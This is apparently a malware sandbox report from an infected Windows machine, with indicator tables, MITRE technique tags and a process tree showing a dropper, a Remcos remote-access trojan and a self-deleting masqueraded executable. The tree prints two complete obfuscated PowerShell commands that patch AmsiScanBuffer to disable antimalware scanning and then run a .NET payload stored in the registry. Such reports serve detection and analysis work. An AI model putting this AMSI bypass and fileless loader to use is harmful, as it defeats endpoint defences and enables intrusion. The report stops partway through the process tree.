pid	Process
6072	9feskIx.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1104	powershell.exe
1104	powershell.exe
3976	AzVRM7c.exe
3976	AzVRM7c.exe
3976	AzVRM7c.exe
3976	AzVRM7c.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
4656	3EUEYgl.exe
4656	3EUEYgl.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
6072	9feskIx.exe
6072	9feskIx.exe
4656	3EUEYgl.exe
4656	3EUEYgl.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
5108	graph.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
5108	graph.exe
5108	graph.exe
4564	dwVrTdy.exe
4564	dwVrTdy.exe
4564	dwVrTdy.exe
4564	dwVrTdy.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe
1896	4XYFk9r.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5104	remcos.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2480	New Text Document mod.exe
Token: SeDebugPrivilege	4560	client.exe
Token: SeRestorePrivilege	5008	7z.exe
Token: 35	5008	7z.exe
Token: SeSecurityPrivilege	5008	7z.exe
Token: SeSecurityPrivilege	5008	7z.exe
Token: SeRestorePrivilege	4868	7z.exe
Token: 35	4868	7z.exe
Token: SeSecurityPrivilege	4868	7z.exe
Token: SeSecurityPrivilege	4868	7z.exe
Token: SeRestorePrivilege	992	7z.exe
Token: 35	992	7z.exe
Token: SeSecurityPrivilege	992	7z.exe
Token: SeSecurityPrivilege	992	7z.exe
Token: SeRestorePrivilege	3044	7z.exe
Token: 35	3044	7z.exe
Token: SeSecurityPrivilege	3044	7z.exe
Token: SeSecurityPrivilege	3044	7z.exe
Token: SeRestorePrivilege	3908	7z.exe
Token: 35	3908	7z.exe
Token: SeSecurityPrivilege	3908	7z.exe
Token: SeSecurityPrivilege	3908	7z.exe
Token: SeRestorePrivilege	2544	7z.exe
Token: 35	2544	7z.exe
Token: SeSecurityPrivilege	2544	7z.exe
Token: SeSecurityPrivilege	2544	7z.exe
Token: SeRestorePrivilege	5068	7z.exe
Token: 35	5068	7z.exe
Token: SeSecurityPrivilege	5068	7z.exe
Token: SeSecurityPrivilege	5068	7z.exe
Token: SeRestorePrivilege	4712	7z.exe
Token: 35	4712	7z.exe
Token: SeSecurityPrivilege	4712	7z.exe
Token: SeSecurityPrivilege	4712	7z.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	3044	yiklfON.exe
Token: SeDebugPrivilege	2216	Dynpvoy.exe
Token: SeRestorePrivilege	5152	7z.exe
Token: 35	5152	7z.exe
Token: SeDebugPrivilege	1896	4XYFk9r.exe
Token: SeSecurityPrivilege	5152	7z.exe
Token: SeSecurityPrivilege	5152	7z.exe
Token: SeRestorePrivilege	5644	7z.exe
Token: 35	5644	7z.exe
Token: SeSecurityPrivilege	5644	7z.exe
Token: SeSecurityPrivilege	5644	7z.exe
Token: SeRestorePrivilege	2356	7z.exe
Token: 35	2356	7z.exe
Token: SeSecurityPrivilege	2356	7z.exe
Token: SeSecurityPrivilege	2356	7z.exe
Token: SeRestorePrivilege	3188	7z.exe
Token: 35	3188	7z.exe
Token: SeSecurityPrivilege	3188	7z.exe
Token: SeSecurityPrivilege	3188	7z.exe
Token: SeRestorePrivilege	1620	7z.exe
Token: 35	1620	7z.exe
Token: SeSecurityPrivilege	1620	7z.exe
Token: SeSecurityPrivilege	1620	7z.exe
Token: SeRestorePrivilege	2824	7z.exe
Token: 35	2824	7z.exe
Token: SeSecurityPrivilege	2824	7z.exe
Token: SeSecurityPrivilege	2824	7z.exe
Token: SeDebugPrivilege	6040	tasklist.exe
Token: SeRestorePrivilege	3772	7z.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
5496	M5iFR20.exe
5496	M5iFR20.exe
5496	M5iFR20.exe
3112	dllhost.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5496	M5iFR20.exe
5496	M5iFR20.exe
5496	M5iFR20.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6072	9feskIx.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2480 wrote to memory of 2648	2480	New Text Document mod.exe	84
PID 2480 wrote to memory of 2648	2480	New Text Document mod.exe	84
PID 2480 wrote to memory of 2648	2480	New Text Document mod.exe	84
PID 2480 wrote to memory of 4560	2480	New Text Document mod.exe	85
PID 2480 wrote to memory of 4560	2480	New Text Document mod.exe	85
PID 2648 wrote to memory of 4072	2648	random.exe	89
PID 2648 wrote to memory of 4072	2648	random.exe	89
PID 4072 wrote to memory of 4808	4072	cmd.exe	91
PID 4072 wrote to memory of 4808	4072	cmd.exe	91
PID 4072 wrote to memory of 5008	4072	cmd.exe	92
PID 4072 wrote to memory of 5008	4072	cmd.exe	92
PID 4072 wrote to memory of 4868	4072	cmd.exe	93
PID 4072 wrote to memory of 4868	4072	cmd.exe	93
PID 4072 wrote to memory of 992	4072	cmd.exe	96
PID 4072 wrote to memory of 992	4072	cmd.exe	96
PID 4072 wrote to memory of 3044	4072	cmd.exe	97
PID 4072 wrote to memory of 3044	4072	cmd.exe	97
PID 4072 wrote to memory of 3908	4072	cmd.exe	98
PID 4072 wrote to memory of 3908	4072	cmd.exe	98
PID 4072 wrote to memory of 2544	4072	cmd.exe	100
PID 4072 wrote to memory of 2544	4072	cmd.exe	100
PID 4072 wrote to memory of 5068	4072	cmd.exe	101
PID 4072 wrote to memory of 5068	4072	cmd.exe	101
PID 4072 wrote to memory of 4712	4072	cmd.exe	102
PID 4072 wrote to memory of 4712	4072	cmd.exe	102
PID 4072 wrote to memory of 892	4072	cmd.exe	103
PID 4072 wrote to memory of 892	4072	cmd.exe	103
PID 4072 wrote to memory of 872	4072	cmd.exe	104
PID 4072 wrote to memory of 872	4072	cmd.exe	104
PID 872 wrote to memory of 2664	872	in.exe	105
PID 872 wrote to memory of 2664	872	in.exe	105
PID 872 wrote to memory of 3180	872	in.exe	106
PID 872 wrote to memory of 3180	872	in.exe	106
PID 872 wrote to memory of 4616	872	in.exe	107
PID 872 wrote to memory of 4616	872	in.exe	107
PID 872 wrote to memory of 1104	872	in.exe	108
PID 872 wrote to memory of 1104	872	in.exe	108
PID 1104 wrote to memory of 4368	1104	powershell.exe	113
PID 1104 wrote to memory of 4368	1104	powershell.exe	113
PID 2480 wrote to memory of 1664	2480	New Text Document mod.exe	114
PID 2480 wrote to memory of 1664	2480	New Text Document mod.exe	114
PID 1664 wrote to memory of 1356	1664	l4.exe	117
PID 1664 wrote to memory of 1356	1664	l4.exe	117
PID 2480 wrote to memory of 4820	2480	New Text Document mod.exe	123
PID 2480 wrote to memory of 4820	2480	New Text Document mod.exe	123
PID 2480 wrote to memory of 4820	2480	New Text Document mod.exe	123
PID 2480 wrote to memory of 3044	2480	New Text Document mod.exe	124
PID 2480 wrote to memory of 3044	2480	New Text Document mod.exe	124
PID 2480 wrote to memory of 3044	2480	New Text Document mod.exe	124
PID 2480 wrote to memory of 3976	2480	New Text Document mod.exe	125
PID 2480 wrote to memory of 3976	2480	New Text Document mod.exe	125
PID 2480 wrote to memory of 960	2480	New Text Document mod.exe	127
PID 2480 wrote to memory of 960	2480	New Text Document mod.exe	127
PID 2480 wrote to memory of 960	2480	New Text Document mod.exe	127
PID 3976 wrote to memory of 5108	3976	AzVRM7c.exe	128
PID 3976 wrote to memory of 5108	3976	AzVRM7c.exe	128
PID 2480 wrote to memory of 4732	2480	New Text Document mod.exe	129
PID 2480 wrote to memory of 4732	2480	New Text Document mod.exe	129
PID 2480 wrote to memory of 4732	2480	New Text Document mod.exe	129
PID 2480 wrote to memory of 4656	2480	New Text Document mod.exe	130
PID 2480 wrote to memory of 4656	2480	New Text Document mod.exe	130
PID 2480 wrote to memory of 4656	2480	New Text Document mod.exe	130
PID 2480 wrote to memory of 2216	2480	New Text Document mod.exe	131
PID 2480 wrote to memory of 2216	2480	New Text Document mod.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 7 IoCs

Hidden Files and Directories

T1564.001

pid	Process
3888	attrib.exe
3988	attrib.exe
5680	attrib.exe
4976	attrib.exe
3180	attrib.exe
2664	attrib.exe
892	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2f556b46-b4fa-40a1-9d8d-75055e262b48}
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of FindShellTrayWindow
  PID:3112
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im conhost.exe
    3⤵
    - Kills process with taskkill
    PID:2984
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:5080

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of SetThreadContext
PID:676
- C:\Windows\system32\lsass.exe
  "C:\Windows\system32\lsass.exe"
  2⤵
  - Drops file in System32 directory
  PID:4588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1184
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3004
- C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
  C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2396
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:6048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:6024
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.1.10.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JKDOUiagHrSJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$umeyVVLDGToceF,[Parameter(Position=1)][Type]$ZrAdVhcZsG)$fVXKhXXHDLa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType(''+'M'+'y'+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'at'+[Char](101)+''+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'la'+'s'+''+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$fVXKhXXHDLa.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'ecia'+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'P'+'u'+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$umeyVVLDGToceF).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+'m'+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$fVXKhXXHDLa.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+''+'k'+'e',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+'S'+'ig,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$ZrAdVhcZsG,$umeyVVLDGToceF).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e,'+'M'+'a'+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $fVXKhXXHDLa.CreateType();}$bXtmKZSCpTVYx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'tem.'+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'od'+[Char](115)+'');$wFvYxvohMAUEzS=$bXtmKZSCpTVYx.GetMethod(''+'G'+''+'e'+''+'t'+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kcdKkUtmtPkDSiHcEjk=JKDOUiagHrSJ @([String])([IntPtr]);$EdgixwyRFbiznMIWkxEVmz=JKDOUiagHrSJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WjgfhfLEWhZ=$bXtmKZSCpTVYx.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oFyepkmkifGwOa=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$WjgfhfLEWhZ,[Object](''+'L'+'o'+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+'yA')));$qKBxhpyTCNRWlxRjW=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$WjgfhfLEWhZ,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+'ua'+'l'+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$CBYkFaL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oFyepkmkifGwOa,$kcdKkUtmtPkDSiHcEjk).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+'l'+'');$hGgbzRwWIwmVzgVZl=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$CBYkFaL,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+'e'+'r'+'')));$MQjGkNOzLa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qKBxhpyTCNRWlxRjW,$EdgixwyRFbiznMIWkxEVmz).Invoke($hGgbzRwWIwmVzgVZl,[uint32]8,4,[ref]$MQjGkNOzLa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hGgbzRwWIwmVzgVZl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qKBxhpyTCNRWlxRjW,$EdgixwyRFbiznMIWkxEVmz).Invoke($hGgbzRwWIwmVzgVZl,[uint32]8,0x20,[ref]$MQjGkNOzLa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+''+'s'+''+[Char](115)+''+'t'+'a'+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IatsIrXKqRUi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tBgnKfIAsRoNDB,[Parameter(Position=1)][Type]$BMKFNGQnYY)$yyKwRIgiJdI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+'ry'+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+'l'+'eg'+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+'C'+'la'+'s'+'s,'+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$yyKwRIgiJdI.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+'i'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$tBgnKfIAsRoNDB).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$yyKwRIgiJdI.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+'ke','P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$BMKFNGQnYY,$tBgnKfIAsRoNDB).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+''+'d'+'');Write-Output $yyKwRIgiJdI.CreateType();}$kNeUHdWwRUBMt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+'m'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$pqiKfkcfZnbZUs=$kNeUHdWwRUBMt.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dPmhKfslVrSewqGQWEL=IatsIrXKqRUi @([String])([IntPtr]);$CxAkEzjAKKRynRZcRnroip=IatsIrXKqRUi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XGffGHvokiP=$kNeUHdWwRUBMt.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+'od'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32.'+[Char](100)+'l'+[Char](108)+'')));$jlMcWRhAYaEWJr=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$XGffGHvokiP,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'y'+[Char](65)+'')));$ubfsRlzJTLxedNVJi=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$XGffGHvokiP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+'ct')));$PCuKzbd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jlMcWRhAYaEWJr,$dPmhKfslVrSewqGQWEL).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+'l'+'');$KpfnIWStGwKffFFYy=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$PCuKzbd,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$lFdXhORsVY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ubfsRlzJTLxedNVJi,$CxAkEzjAKKRynRZcRnroip).Invoke($KpfnIWStGwKffFFYy,[uint32]8,4,[ref]$lFdXhORsVY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KpfnIWStGwKffFFYy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ubfsRlzJTLxedNVJi,$CxAkEzjAKKRynRZcRnroip).Invoke($KpfnIWStGwKffFFYy,[uint32]8,0x20,[ref]$lFdXhORsVY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](114)+''+[Char](117)+''+'t'+''+[Char](115)+'s'+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2920
- C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
  C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
  2⤵
  PID:3672
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:7016
- C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
  C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
  2⤵
  PID:4496
- C:\Windows\SysWOW64\ruts\rutserv.exe
  C:\Windows\SysWOW64\ruts\rutserv.exe
  2⤵
  PID:7224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1384
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1560

C:\Windows\System32\svchost.exe
